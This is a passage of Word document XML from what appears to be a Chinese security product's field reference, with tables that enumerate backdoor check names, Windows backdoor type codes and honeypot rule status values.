          <w:p w14:paraId="0151DABB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>RPM-based应用后门检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C40D874" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6840D0FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="475A4C71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E336590" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>DPKG-based应用后门检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44CC2F56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="25A0BB46" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="199E05C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E4F650C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>磁盘MBR检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E47672" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35071F35" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="223D2753" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F1A6C27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>计划任务检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53B3D534" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28DF22B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D44FCA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A9CBE87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>动态链接库检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A45F545" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B159D32" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1342DD36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072D0C3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>基本命令检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663ADBF8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="02C91844" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="073C7AC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="363F089F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>已知rootkit检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B3A9DEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18EB077D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77B49EA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67373E1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统内核模块检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D56E063" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5C9AB5FE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B8B11DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713921C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>网络状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37D0B41E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="562CB8CA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3644BBF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05EC0C1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B99610B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AA7257C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CB9F667" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="552E78CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统文件状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72DD30D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F9BEE21" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6955D23F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>backDoorCheckName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C6FB0AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程状态检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03D9A502" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C0B4EDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="609" w:name="_Toc115166377"/>
      <w:bookmarkStart w:id="610" w:name="windows后门类型"/>
      <w:bookmarkEnd w:id="608"/>
      <w:r>
        <w:t>windows后门类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="609"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1767"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="22D3BB22"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8DD5D2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4CB94D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D6DA805" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F103A84" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FBECFCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4637047A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47B392B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未知类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17620F45" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA1B118" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2213C913" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C15B232" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13FB40D4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27F07B25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FB1134E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573E8182" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑线程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DF2C144" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28F2CE5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05E3E5B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12EF35E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可疑模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="15EFD955" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64ED474F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DD59A68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06917987" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>可疑启动</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>项</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33652719" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D714894" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DFA202B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FB0F99F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>映像劫持</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64C3FE90" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A99B7DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>backDoorTypeId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="062F3B3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D0004C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>恶意进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E09C3F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="611" w:name="_Toc115166378"/>
      <w:bookmarkStart w:id="612" w:name="网络蜜罐规则状态"/>
      <w:bookmarkEnd w:id="610"/>
      <w:r>
        <w:t>网络蜜罐规则状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="611"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="74AD966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7AF928D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5596116D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79275324" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16256A98" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="426F8685" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B887076" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C4F3808" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="24C6066A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3476FAF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5386ED4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4ADB25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BF0E09B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="613" w:name="_Toc115166379"/>
      <w:bookmarkStart w:id="614" w:name="网络蜜罐规则同步状态"/>
      <w:bookmarkEnd w:id="612"/>
      <w:r>
        <w:t>网络蜜罐规则同步状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="613"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
